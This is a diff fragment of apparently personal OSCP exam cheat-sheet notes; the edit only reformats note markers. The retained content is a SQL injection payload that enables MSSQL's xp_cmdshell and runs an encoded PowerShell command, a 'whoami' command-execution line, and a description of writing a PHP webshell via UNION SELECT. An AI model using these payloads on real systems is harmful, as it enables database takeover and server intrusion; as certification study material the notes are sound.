douglaskataki/oscp-report-notes/Cheatsheet - Machines.md

 EXECUTE xp_cmdshell 'whoami';
 ```

-#note Example using these commands:
+NOTE: Example using these commands:
 ```
 ' EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE; EXECUTE xp_cmdshell 'powershell -e ...';-- //
 ```

-#note For this attack to work, the file location must be writable to the OS user running
+NOTE: For this attack to work, the file location must be writable to the OS user running
 the database software.

 UNION SELECT SQL keywords to include a single PHP line into the first column and save it as **webshell.php** in a writable web folder